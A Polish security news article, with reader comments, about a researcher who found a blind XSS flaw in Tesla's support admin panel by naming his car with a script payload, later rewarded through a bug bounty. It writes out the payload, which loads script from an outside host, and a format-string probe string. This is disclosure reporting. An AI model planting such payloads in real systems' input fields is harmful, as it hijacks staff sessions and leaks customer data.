Kamyk „warty” 40 000 PLN uszkodził mu szybę w Tesli. Dzięki temu znalazł podatność w panelu administracyjnym.

16 lipca 2019, 21:05 | Aktualności | komentarze 4
: zin o bezpieczeństwie - pobierz w pdf/epub/mobi.

Co robi dobry badacz bezpieczeństwa po zakupie nowego samochodu, dajmy na to Tesli model 3? Oczywiście zaczyna niezwłocznie szukać podatności. Tak też stało się i w tym przypadku. Szło jednak kiepsko – żadnych format stringów poprzez podłączanie telefonu o nazwie %x%x%x%x, a nazwanie samochodu w dość specyficzny sposób też niewiele przyniosło…:

Słowem bez sensu i trzeba wreszcie się wybrać na przejażdżkę. Ta też nie okazała się zbytnio szczęśliwa – drobny kamień uszkodził szybę:

Uszkodzenie

Coż, trzeba było w oficjalnej aplikacji Tesli wystawić zgłoszenie serwisowe i … tym razem badaczowi dopisało trochę szczęścia. Prawdopodobnie pracownik, który po stronie Tesli obsługiwał zgłoszenie zobaczył wpis z nazwą samochodu "><script src=//zlz.xss.ht> i dalej poszło już gładko.

W kontekście zalogowanej sesji pracownika wykonał się JavaScript, który wykonał m.in. zrzuty ekranowe wysłane następnie na serwer badacza. Sam panel dawał możliwość oglądnięcia statystyk samochodu (w URL-u był też prosty ID samochodu, aż prosiło się go trochę poiterować).

Badacz wysnuł teorię, że poza odczytem danych w zasadzie można by również modyfikować dane dotyczące jego (czy też innych) samochodów:

The thing that was very interesting was that live support agents have the capability to send updates out to cars and, most likely, modify configurations of vehicles.

Po zgłoszeniu podatność została załatana z priorytetem 1. a sam badacz otrzymał nagrodę $10 000 w ramach oficjalnego programu bug bounty.

–Michał Sajdak

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

  1. Dżim

    No dobra, a co z szybą?

    Odpowiedz
    • Tomek

      A szyba kosztuje 12000 dolarów ?
      Heee
      A tak na serio to raczej mu styknie na nową. To jest szczęśliwy traf.

      Odpowiedz
  2. zero one

    Dołoży kolejne 10 tyś. i kupi sobie porządną furę. ;-E

    Odpowiedz
  3. zaciekawiony

    Bardziej mnie ciekawi jaki kod został wykonany.

    Odpowiedz

Odpowiedz